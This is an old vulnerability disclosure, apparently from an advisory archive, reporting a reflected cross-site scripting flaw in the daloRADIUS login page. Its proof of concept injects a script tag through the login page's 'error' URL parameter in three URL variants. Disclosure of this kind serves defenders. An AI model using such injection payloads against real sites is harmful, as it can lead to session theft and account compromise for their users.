Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[scip-Advisory 4063] PasswordManager Pro 6.1 Script Injection Vulnerability

WSCreator 1.1 Blind SQL Injection

[BMSA-2009-08] Multiple Vulnerabilities in PyForum

phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities

From:	hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com>
Date:	15.12.2009
Subject:	Daloradius XSS Vulnerability

###########################################
#
# Script Name : daloradius ( All Version )
#  
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/daloradius/
#

###########################################

PoC :

http://[target]/[path]/daloradius-users/login.
php?error=>"><script>alert('Hadi Kiamarsi')</script>

example :

http://www.example.com/daloradius-users/login.php?error=>"><script>
alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/root/daloradius-users/login.
php?error=>"><script>alert('Hadi Kiamarsi')</script>